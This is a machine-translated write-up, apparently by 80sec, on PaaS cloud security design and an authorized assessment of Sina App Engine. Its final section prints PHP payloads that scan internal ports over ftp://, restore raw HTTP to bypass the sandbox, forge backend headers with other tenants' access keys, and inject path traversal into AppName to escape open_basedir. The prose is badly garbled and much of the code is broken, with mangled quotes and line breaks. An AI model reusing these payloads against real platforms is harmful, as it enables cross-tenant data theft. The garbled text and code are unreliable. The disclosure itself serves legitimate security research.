Discussion on cloud security from an authorization security assessment of SAE

Source: Internet
Author: User
Tags mysql code phpinfo ftp protocol

Email:jianxin#80sec.com
Site:http://www.80sec.com
Date:2011-12-20
from:http://www.80sec.com/

Directory
A background and description
Two what is cloud
Three what is cloud security
Four how to design the cloud safely
Five-to-one authorization security assessment test for SAE

A background and brief introduction

Because of the slow and often inaccessible server access abroad, we worked with SAE earlier to move the Wooyun project to a more stable SAE platform, and subsequently established a partnership with Sina SAE on security, including the safety assessment test. On the other hand, the industry's discussion on cloud security is more theoretical, many experts and even security researchers and hackers are talking about cloud security, but few of the actual production environment of the cloud assessment analysis or even intrusion cases, 80SEC has been on the cloud security has its own ideas, However, there is no actual case so there is no relevant documentation output, we have been in the SAE after the repair of these security issues, after the SAE to allow this to a typical PAAs cloud assessment process, by the way some of our 80sec in the cloud security of some superficial ideas, Some of the detailed security issues will also be committed to the cloud-vulnerability reporting platform, saying that security is not as secure as:)

Two what is cloud

We understand that the cloud is a new way of using resources, including storage, data, computing, networking ... And so on, this kind of resources compared to the traditional resources, more close to a basic energy, how much to use, similar to the water and electricity in the infrastructure of the elasticity, according to how much to pay, so far, we are very difficult to have a precise definition of the cloud, we stand in a safe angle can only superficial to the cloud into:

Private Cloud: A cloud service with unlimited computing power and unlimited storage capacity for internal business services;
Public cloud: To provide services to external users, on the basis of computing power and storage capacity, may be with the company's core resources in the form of SaaS to provide external user services to the cloud;

Similarly, according to the actual manifestation and function of the cloud can be divided into Iaas,paas,saas, different types of cloud is the nature of the different resources, the next layer of service, IAAS provides network and system level of resource fine-grained division, PAAs relies on the IaaS can be stored, calculated, Resources such as data are open to third-party developers, and the platform provided by PAAs enables a wide variety of software-level SaaS combinations of corporate core resources to provide services to users;

Three what is cloud security

Security is always the data, the nature of security is the security of data, including the availability, confidentiality and non-tamper, a security challenge is that cloud security essentially changes the way data is handled, from the traditional data owners to security responsibility to become data processors and data owners at the same time security responsibility.
Another challenge posed by cloud security is a contradiction, for users if I want to use the cloud, because I might be able to send sensitive data to the cloud, I want to make sure that the cloud is secure, and if I am a cloud builder, I am responsible for cloud security, I have to first confirm the cloud data processing and collaboration methods, In the case of data size and application is not mature, it will be difficult to do this, I can not protect a threat model is not mature system, so on the one hand there is a cloud security ahead of the development of cloud computing situation, but at the same time cloud security because the cloud business development is not enough to be at a theoretical and strategic level of the situation;
Different clouds, because the actual business goals and the data contained in different, there will be different security threats so that there will be different cloud security, such as PAAs need to consider things and an iaas need to consider the security will be completely different, the same private cloud security objectives and public cloud security objectives will be completely different, Still a long time ago 80sec mentioned, do not understand the context of security is meaningless;

Four how to design the cloud safely

I believe that the security of any thing will be caused by the following aspects, its own value, the value of the risk of attracting, whether to consider the risk of protection and practical solutions, the solution is correctly implemented, the correct implementation of the solution after the formation of an effective system for management and operations, The lack of any one link will bring insecurity;
For the cloud, we believe that there is no unified cloud security, so we can only choose a more typical example of PAAs to talk about our shallow view of cloud security design, we will consider the following several dimensions:

A) asset value: We need to understand the value of the core of the business, different values of data can lead to different security threats, such as PAAs, we are very much disapprove of the use of the network (you understand), the bank and other systems running on the PAAs, it is not suitable for you, and high-value asset introduction will raise the risk of cloud;

b) Security risk: a specific asset will be subject to different security risks, a site involving state secrets may be subject to security risks and a personal blog must be completely different, analysis of the risks we may be subjected to, such as denial of service, user data is illegal access to the internal network infiltration and so on;

c) Threat modeling: Based on the risks that the cloud can sustain and the pathways that can cause these risks, the focus is on analyzing the system's architecture, security domains, and the boundaries of each security domain, and establishing threat models such as network attacks, malicious scans, and so on, that include external networks in the context of the PAAs cloud platform and the Internet. For the user data and platform data boundary should consider the malicious code to the platform data, even because the PAAs multi-user particularity, should consider the user data boundary threat, in addition to consider the platform to the internal data center influence;

d) Security policy: Based on the threat modeling described above, we can implement the necessary security policies for various threats to eliminate and weaken risks, such as requiring firewalls to be deployed on the PAAs cloud boundary and deploying intrusion detection and monitoring systems between the platform and the internal network , for the platform and users, as well as user and user requirements to achieve security isolation, and so on;

e) Technical control: How the strategy can be concrete implementation of the implementation, is a difficult thing, but also the most important part of the work, most of the enterprises are also the most lack of technical evaluation of this piece, not enough technical support, security policy is only dead letter; This part should include security baselines, access control, Anomaly Monitoring

As you can see, our security design is a data and risk-driven security design, with Sina Cloud SAE as an example, we can divide the data involved by attribute and security level into a number of security areas, each security zone to achieve the corresponding level of security control, access behavior between the regions need to be subject to strict monitoring and auditing:

A) Sina internal data (within Sina IDC, unauthorized access to Sina's internal receipts will lead to harm)
b) SAE platform data (platform to support the security of the entire user data, high security level)
c) SAE user data (can be further refined to user data A, user data B)

The properties of these areas are completely different, for access needs to do different access control, for internal data, should be the peace platform itself to complete isolation, which can be divided into separate networks to control, theoretically we trust the internal network, But if the platform is important enough, we can isolate it from internal access and requests, and it should be completely isolated between the platform data and the user, which is based on the host and some background services, so it can be controlled through the network and the sandbox on the host; for data between users, as security requires isolation , this part needs to implement a set of isolation mechanisms at the application layer, and for the isolation between the platform and the extranet, we need to strictly defend against such denial of service DDoS and some common application vulnerabilities.
These parts, if not done well, will lead to security problems, whether we are implementation or evaluation are from these parts to consider;

Five-to-one authorization security assessment test for SAE

Our site has been built on the SAE platform, whether it is speed, stability and staff attitude to the problem is very good, the SAE before and the dark clouds interested in a number of cooperation including the SAE safety assessment and testing, SAE security is in place, the problems we found have been positive feedback and repair, After getting the SAE's permission, here we share some of the problems we found, and believe that it will help other PAAs-like platforms.

1know it to understand our testing goals

According to our rough analysis of Sina Cloud, data will be divided into Sina internal data, SAE platform data and SAE user data, in which Sina internal data mainly refers to internal IDC other business data, platform data including platform management and operations and related business data, User data mainly refers to the user uploaded to the SAE including code, database, storage and other data. In accordance with our security objectives, these data should be isolated from each other, should not affect each other, will not be illegal access;
Sina's protection of the cloud is basically divided into several aspects, on the one hand, the external firewall to achieve the control boundary between SAE and the Internet, in the same way, the use of appropriate ACLs on internal data protection, Another aspect that we are very concerned about is that the uniqueness of PAAs is the isolation of user data and the isolation of user data from the cloud platform, which is the most complex and flexible; SAE's isolation of user data is primarily through user name and password isolation between different users, Access_key and Secert_key are used to isolate the different applications, and applications such as database and storage access to the backend must provide Access_key and Secert_key For the isolation of the user data and the platform mainly includes the use of all resources must be through the interface provided by the SAE, the original ecological file read and write, network requests are forbidden, and for the Code execution layer, SAE through disable_function and Open_ Basedir simulates a sandbox environment to enable a sandbox in the execution state to ensure that users cannot access data other than their resources;
We saw the SAE's efforts in this piece, and we tried to make a breakthrough for him;

2 Look at the resources we can get

Since we can really interact with the rich other user resources that the SAE and SAE backend have, the only way to do this is to execute our own code, so the environment and the actual limitations of our code are important to us, and we judge the system by the following code:


<?php

$exts =get_loaded_extensions ();
$disables =ini_get ("disable_functions");
$disables =explode (",", $disables);

$alls =get_defined_functions ();

$myfun = $alls [' user '];

for ($i =0; $i <count ($alls [' internal '); $i + +) {
if (!in_array ($alls [' internal '] [$i], $disables)) {
$myfun []= $alls [' internal '] [$i];
}
}

Var_dump ($myfun);

?>

This is all the scope of our code executable, that is, all of our possible interactions, we can see the basic already know can break through the sandbox of functions and methods are limited;

3 Analysis of our environment

At the same time we can see that the SAE provides PHPINFO function support, then we can simply judge the current environment through phpinfo, we need to care about the following options:


Registered PHP Streams
apache2handler
Apache Environment

Open_basedir
Disable_functions

auto_prepend_file

So we probably know where our code is running, and we know some of the things that are done at the application layer, according to Auto_prepend_file, and there are too many secrets, including the way back-end services work and some of the gaps that can be found in the SAE-made sandbox, After all, this is the same layer of our code to do the security control, not the lower level, the main include the package of network requests, backend resource access encapsulation, and that Access_key and Secert_key is the role here;

4 Attack mode

Our code runs in a open_basedir and disable_function environment, which, under normal circumstances, isolates our code from the file system and the operating system, leaving us in a restricted environment, At the same time, because the code in PHP is better than our code execution, the PHP code layer also implements a sandbox, in which our interactions with any other resource are restricted, such as HTTP requests and socks requests, and normally allowed connections such as MySQL, Through our tests, we found that due to the modification of the underlying MySQL code, in the SAE code execution Environment we were unable to connect to any data other than our inherent permissions, but we could see that because the SAE chose the sandbox at the application layer rather than the lower level, So as long as we have the possibility to choose where some sandbox is not controlled, it can be bypassed, and it can cause problems if the sandbox itself is not well implemented.
First to see if the sandbox is a possible loophole, we can simply make a traversal of the allowed PHP function, found that such a function mb_send_mail is not disabled, 80sec has mentioned to disable the mail function because it will be PHP and the underlying system to interact with an interface , and Mb_send_mail is also just a package for the mail function, our simple test proves that we can actually use this function to read and write to the underlying system, but because of some reasons of the network we get a 500 error, we need the result does not have the truthful feedback to us, But after the SAE confirmed that the problem does exist
In addition, we have observed that the SAE supports a very large number of flows, but actually encapsulated only one HTTP protocol, the purpose of encapsulation is to control the user generated requests, such as restricting access to the destination address and the number of requests to do more granular control, And for the native FTP protocol is not limited, this time we can actually use this to do a simple intranet port scanner:


echo(file_get_contents(‘ftp://127.0.0.1:22/111‘));

Since the SAE is too good for the wrong handling of the bugs, we can see whether the network is unreachable, the ports are not open or the protocol does not match, so we can even detect how isolated the SAE is from the internal network.
FTP protocol is not particularly friendly after all, and for the already encapsulated HTTP protocol we found that Stream_wrapper_unregister and Stream_wrapper_restore are not disabled, so through these two functions we can restore the native HTTP request To launch an HTTP request to all the places we want to launch:


if ( in_array( "http", stream_get_wrappers() ) ) {
stream_wrapper_unregister("http");
}

stream_wrapper_restore("http"));

This is only a few breakthroughs in the network request sandbox, in the actual user data layer, we found that in the backend users are sharing some basic services, such as memcache, such as MySQL, the backend through the user passed Access_key and Secert_key to identify users, We did a very interesting experiment:


define( ‘SAE_ACCESSKEY‘, ‘m0lm3wyxjyo‘ );
define( ‘SAE_SECRETKEY‘, ‘5d2dmz1xwyihjd2m3xzximw5wj30jix0djxl1c5i0iz5‘ );
define( ‘SAE_MYSQL_HOST_M‘, ‘w.rdc.sae.sina.com.cn‘ );
define( ‘SAE_MYSQL_HOST_S‘, ‘r.rdc.sae.sina.com.cn‘ );
define( ‘SAE_MYSQL_PORT‘, 3307 );
define( ‘SAE_MYSQL_USER‘, SAE_ACCESSKEY );
define( ‘SAE_MYSQL_PASS‘, SAE_SECRETKEY );
define( ‘SAE_MYSQL_DB‘, ‘app_‘ . ‘wscan‘ );

var_dump(mysql_connect(‘r.rdc.sae.sina.com.cn:3307‘,‘m0lm3wyxjyo‘,‘5d2m1d0wfffyihj2m3xximw5wj30jix0jxlxl05i0iz5‘));

This will prompt

Sae_warning:mysql_connect () [Function.mysql-connect]: This app isn't authorised in eval.php

It seems that the underlying MySQL has limited the application of the connection, does not allow cross-application to connect the database, but we know that in addition to the application code environment can be connected to the database, in the SAE provided by the Panel can also go to the database connection, the implementation in the Control Panel is through the Access_ Key and Secret_key in the background of the connection, we just replace with the other applications we obtained the corresponding key can be connected successfully, the sandbox seems too simple, or do not do the application can only access their own data this principle, then how to get someone else's Access_ Key and Secret_key, look at that auto_prepend_file file, these two values are passed from the HTTP request, and because of the implementation of the reason, this content in the phpinfo is directly visible, on Baidu search Sae,phpinfo it ... ...
It seems that we can understand some of the mechanisms and mechanisms of the SAE, but all of them are between users, and we are curious as to why the SAE needs to pass Access_key and Secert_key in the HTTP header, which seems rather difficult to understand, After analyzing the implementation mechanism of SAE, we can probably make the following understanding, after the front-end receives the request, will make some logic judgment on the request, such as whether it is a valid application, whether the application resource is exceeded, etc., after the validation is done, the request is forwarded to the backend execution layer. Some of the data required to execute the environment, such as Access_key and Secert_key, is passed from here to the execution environment, where the benefit is that the execution environment is only responsible for execution, without verifying the legality of the request, any changes to the application, such as disabling enable, and increasing the deletion will not affect the backend execution environment. But there will be obvious problems, if the legitimacy of the request is only in the front-end verification then if we can directly forward the request to the backend is likely to affect the correctness of the back-end logic, note the following information in Phpinfo:


DOCUMENT_ROOT/data1/www/htdocs
SERVER_ADMIN[email protected]
SCRIPT_FILENAME/data1/www/htdocs/549/wscan/1/phpinfo.php

What we're asking for is that Phpinfo.php,document_root is in/data1/www/htdocs, and the theory is that it can't be mapped to/data1/www/htdocs/549/wscan/1/. Phpinfo.php, and from this path we speculate that all the application execution code is under/data1/www/htdocs/, all the execution code is running the same user identity, because for some reason SAE does not design all the user's executable code to be isolated , isolation is only done using dynamic mappings and dynamic constraints at the execution level, is there a problem with this mechanism, see the following wonderful code:


if ( in_array( "http", stream_get_wrappers() ) ) {
stream_wrapper_unregister("http");
}

Stream_wrapper_restore ("http");

$opt = array(
‘http‘ => array(
‘header‘ => "Host: wooyun.sinaapp.comrnX-Forwarded-For: 61.135.165.180, 61.135.165.180rnAppName: webmanagernAccessKey: ynz0jyo1k1rnSecretKey: 1zhwzm5l4yilzyj54xiim5ddywwzzzz342l5lk5rnAppHash: 928rnMysqlPort: 3307rnAppCookie: default_version=1;xhprof=;debug=1;rnConnection: closernCookie: saeut=220.181.50.244.1321955938519836rnAppVersion: 1",
‘protocol_version‘ => ‘1.1‘
)
);
stream_context_set_default($opt);
$d = stream_context_get_default();
var_dump(file_get_contents("http://10.67.15.23/phpinfo.php"));

We use the previous way to break the HTTP package to achieve an original ecological HTTP request, the request directly to the back end of the executable layer code, we deliberately use someone else's appname and Apphash to request a phpinfo, the results found as we guess, All requests and requests are dynamically generated, and the rules are generated based on appname and Apphash, such as:


SCRIPT_FILENAME/data1/www/htdocs/549/wscan/1/phpinfo.php

is based on the request of Apphash and AppName and DOCUMENT_ROOT together to determine the path of the request, from this point of view, all users of resources more like the same site under the different pages, in theory, can get other user resources, we try to continue to break through. Since the request path is dynamically generated, we have reason to believe that Open_basedir is also dynamically generated, and since it is dynamically generated we can do an unprecedented injection:

The Open_basedir format is:/DIR/1:/DIR/2

If we can produce a open_basedir for/DIR/1:/:/DIR/2 can break the sandbox of the filesystem, and this request must also be legal, because the file resources we requested will be consistent with this path, we can create a directory named/:/:/, combined. /to traverse the directory, we can meet the requirements of both Open_basedir and Script_filename, and finally let's construct a request like this:


if ( in_array( "http", stream_get_wrappers() ) ) {
stream_wrapper_unregister("http");
}

Stream_wrapper_restore ("http");

$opt = array(
‘http‘ => array(
‘header‘ => "Host: wooyun.sinaapp.comrnX-Forwarded-For: 61.135.165.180, 61.135.165.180rnAppName: webmanage/1/:/:/../../../rnAccessKey: ynztttt1k1rnSecretKey: 1zhwzm5l4yzzzzyj54xiim5ddywwzill342l5lk5rnAppHash: 928rnMysqlPort: 3307rnAppCookie: default_version=1;xhprof=;debug=1;rnConnection: closernCookie: saeut=220.181.50.244.1321955938519836rnAppVersion: 1",
‘protocol_version‘ => ‘1.1‘
)
);
stream_context_set_default($opt);
$d = stream_context_get_default();
var_dump(file_get_contents("http://10.67.15.23/phpinfo.php"));

Note appname:webmanage/1/:/:/. /.. /.. /, this time Webmanage all requests will be bypassed the open_basedir limit, we smoothly access to all users of the code resources, including the SAE platform execution Environment resources;
After gaining access to the data, we tried to make a breakthrough in the SAE system environment and found some problems, but did not get a substantial breakthrough, the opportunity to share again in the future:)

5 Summary

The SAE is designed with security in mind and very tightly guarded to provide an elegant balance of ease of use and security, but we can also see that for PAAs design, the need to allow the user's code to run as friendly and efficient as possible So it's easy to have some problems in the details of some security policy implementation, as the particularity of PAAs application context, other PAAs vendors should pay more attention to these security issues when implementing and designing, and avoid causing security loss to the platform and users.

Discussion on cloud security from an authorization security assessment of SAE

Related Article

Cloud Intelligence Leading the Digital Future

Alibaba Cloud ACtivate Online Conference, Nov. 20th & 21st, 2019 (UTC+08)

Register Now >

Starter Package

SSD Cloud server and data transfer for only $2.50 a month

Get Started >

Alibaba Cloud Free Trial

Learn and experience the power of Alibaba Cloud with a free trial worth $300-1200 USD

Learn more >

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.